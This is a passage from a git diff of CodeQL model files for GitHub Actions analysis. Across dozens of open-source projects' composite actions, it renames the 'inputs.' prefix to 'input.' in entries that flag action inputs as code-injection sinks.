-3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index b2b49fbba09c..5cac21a07514 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file + - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 6755f0d773ce..83e1345edf20 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] - - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 1b55ab2d5490..8708afa3f3bb 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 84401828721d..e4f1637603e8 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 35804a87f055..f8b636c46365 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 981fe0fd3485..f51d784d7c1a 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 6c984a676d06..ac6af801a0e5 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index 1138d37fb5fa..fb676663019e 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file + - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 1418299b39ab..503386ea3d47 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file + - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index fb67f66ce62c..6d48d32e9faf 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "input.some", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 12aa48431db9..ae6d1fcc1e83 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 336af4b814b3..48b982257211 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 8d2170c47e29..14bfe57eb113 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 854601e3ddeb..4b04351ab904 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file + - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 8a6074b87963..755147a6f1ad 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] - - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file + - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 48203004ed58..12017671b4e9 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] + - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 042ca09efa62..e3028cc1bb35 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 51d4903fbb10..ab112bb5ec00 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file + - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 12dc3005260e..0d8ae4e102e4 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file + - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index dfe3b7f43329..44156ddd6709 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file + - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.src_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 663fada6df9a..693d456e4a59 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 4a53345e6e5a..5e3dffbb7f5e 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 0a18189242de..5d782529f7f6 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file + - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 93ec3ea468de..f7f845ac28f7 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file + - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 27f5af98f89a..a58f033cc38d 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 125dd8324d21..aefece4bebda 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index dfa24454444e..5cbcfc018791 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 9469e745ffcc..0712838a737f 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file + - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.password", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 6e34a2cf5927..5ab14ba453bd 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git 